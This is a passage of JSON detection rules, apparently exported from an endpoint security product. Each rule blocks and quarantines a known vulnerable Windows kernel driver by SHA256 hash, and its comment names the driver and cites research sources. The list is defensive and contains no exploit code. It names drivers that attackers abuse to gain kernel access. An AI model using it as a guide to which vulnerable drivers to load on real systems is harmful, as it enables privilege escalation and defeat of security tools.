"comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b4c456b-aaec-5bd3-adb1-35e2ea7e8d4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612753Z", + "creation_date": "2026-03-23T11:45:29.612755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18bea05d56bcbc0e23663db9b6dc79d9db3a218e711415a1e420dea2e183cb5e", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b5e4506-210b-50d1-9edc-a3f4e4159ef0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480347Z", + 
"creation_date": "2026-03-23T11:45:30.480351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1dcdd1efab9abc25f4227b37f76da295a6dc4cf810875ba34ee1d465eb709b70", + "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b643760-8350-5250-876b-83b16092a7e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482422Z", + "creation_date": "2026-03-23T11:45:31.482426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "120150209cbf69e79a5a17336631547b5a19811b2d130672eda29a71d8b51e06", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"0b6c8931-eb0c-5dd1-a939-2bfcd9ad18c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488986Z", + "creation_date": "2026-03-23T11:45:31.488988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08fe4d58f3ad3b133f61482a79087478fcc5bd67e77d1989bafbeb2c1443ab6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b7093c7-4b51-59e4-97dc-d52a26e50874", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982607Z", + "creation_date": "2026-03-23T11:45:29.982609Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.982615Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a", + "comment": "Vulnerable Kernel Driver (aka driver7-x86-withoutdbg.sys) [https://www.loldrivers.io/drivers/d9f2c3d6-160c-4eb3-8547-894fcf810342/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b787999-baf3-5e7c-af28-533cea2e959c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620640Z", + "creation_date": "2026-03-23T11:45:29.620642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b83401b-0090-5038-b99c-5f6581974168", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148608Z", + "creation_date": "2026-03-23T11:45:31.148610Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148615Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30a3428361788d8223b799bc246ac924ebcb368ddd50e58b3331815f14bfd581", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b8826cd-ec92-506c-b062-f5eaae80ddb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834696Z", + "creation_date": "2026-03-23T11:45:30.834700Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834709Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"16826601eb8274fbc8d43508f34a68cc68298b2990e507adb1914df21b403674", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b8abb26-a356-59e6-b179-1a80e3357d06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817644Z", + "creation_date": "2026-03-23T11:45:30.817645Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817651Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "163912dfa4ad141e689e1625e994ab7c1f335410ebff0ade86bda3b7cdf6e065", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0b953ef0-fcbd-5b42-be37-a976e95f67cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818030Z", + "creation_date": "2026-03-23T11:45:31.818034Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818042Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7d93ea1f42314ccfd60ecacdd7d006a1b6f0db13431bf0484ab1aef67aa2408", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ba7ca57-c00e-571b-9ae4-88ff5300564c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491144Z", + "creation_date": "2026-03-23T11:45:31.491147Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e033951baa8fca27e55a540c993ae0d6ae150f6f674649b94f0167452ced7932", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bbfe8f1-6074-5c56-83ed-8de5b0a44a50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826692Z", + "creation_date": "2026-03-23T11:45:30.826694Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826700Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c4ac19ff54da8d0670759be48a3c02face5bb9e8b12a7609f0ef1807b8cfa9f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bcecd76-6f3e-516f-a64a-f85085c9cf67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836699Z", + "creation_date": 
"2026-03-23T11:45:30.836701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836707Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b8b754f5f1c00cc3eaa66baed4767317ab34054a36234c8a0c83f5e7422142e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bd576e8-30c8-5d8a-93f2-e89522cd2997", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836082Z", + "creation_date": "2026-03-23T11:45:30.836084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836215Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1de4ea34aa10a60b0d6aec02ec57fa77ad2a30a43713d0bed7b5e375f86ddb2f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "0bd98ca3-8332-56e1-bae4-5fb35398f0e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604735Z", + "creation_date": "2026-03-23T11:45:29.604737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "220a2dcf4d597f9208c0e7fd7057a91e88e118d420f20aac8e75ae3e39a7ac22", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0be91fa1-80df-5fcd-bc4c-98dfd1c72bdb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983755Z", + "creation_date": "2026-03-23T11:45:29.983757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983762Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25", + "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bf30aba-72dc-5acc-a9ee-982a4c02db63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457861Z", + "creation_date": "2026-03-23T11:45:30.457864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457885Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a495ffa623a5220179b0dd519935e255dd6910b7b7bc3d68906528496561ff53", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bf87bc2-faab-5c3d-aaea-376393799767", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154553Z", + "creation_date": "2026-03-23T11:45:31.154555Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47e207fced7565ccf0f6c03359babd671b65b67c336ae642f37c60bc363aa0ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bfa33b5-746c-5e84-afd7-857dbaa86431", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494053Z", + "creation_date": "2026-03-23T11:45:31.494057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3837e6bb4c2d6083895ba1a7df22bd8241b346a1e726b51b99e8d7e8ddd7cd8", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0bfd4c23-9c36-5728-a55a-8ba59d5ea79b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616023Z", + "creation_date": "2026-03-23T11:45:29.616026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4031eb0a40137c4ab6d2dbdd2755135c63ab137a0aeb74a7bbea6617b96f0a7", + "comment": "TOSHIBA BIOs update vulnerable driver (aka NCHGBIOS2x64.SYS) [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c01846a-3edd-546e-aa57-7fecce8e3ccb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824269Z", + "creation_date": "2026-03-23T11:45:31.824272Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c42e2c89f5c6a0cb91903b2549f4a5aa109f732679db26c6b247ca7075fba144", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c035560-db45-5491-803c-c84398f94958", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809081Z", + "creation_date": "2026-03-23T11:45:31.809083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809089Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1272c192e229d867f524ee124a91ec81a472944f732aaf3d85ee8c6adafb2d90", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"0c078c97-2f90-5ded-89dc-e2a9e8725877", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460956Z", + "creation_date": "2026-03-23T11:45:30.460959Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460968Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fc01f25c4c18a6c539cda38fdbf34b2ff02a15ffd1d93a7215e1f48f76fb3be", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c0f8d5c-8ef9-5233-b4f5-2a1f371a09f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817232Z", + "creation_date": "2026-03-23T11:45:30.817234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817240Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49ae47b6b4d5e1b791b89e0395659d42a29a79c3e6ec52cbfcb9f9cef857a9dd", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c10ce36-7342-5a8e-869b-015fa2183743", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822291Z", + "creation_date": "2026-03-23T11:45:31.822293Z", + "enabled": true, + "block_on_agent": true, + 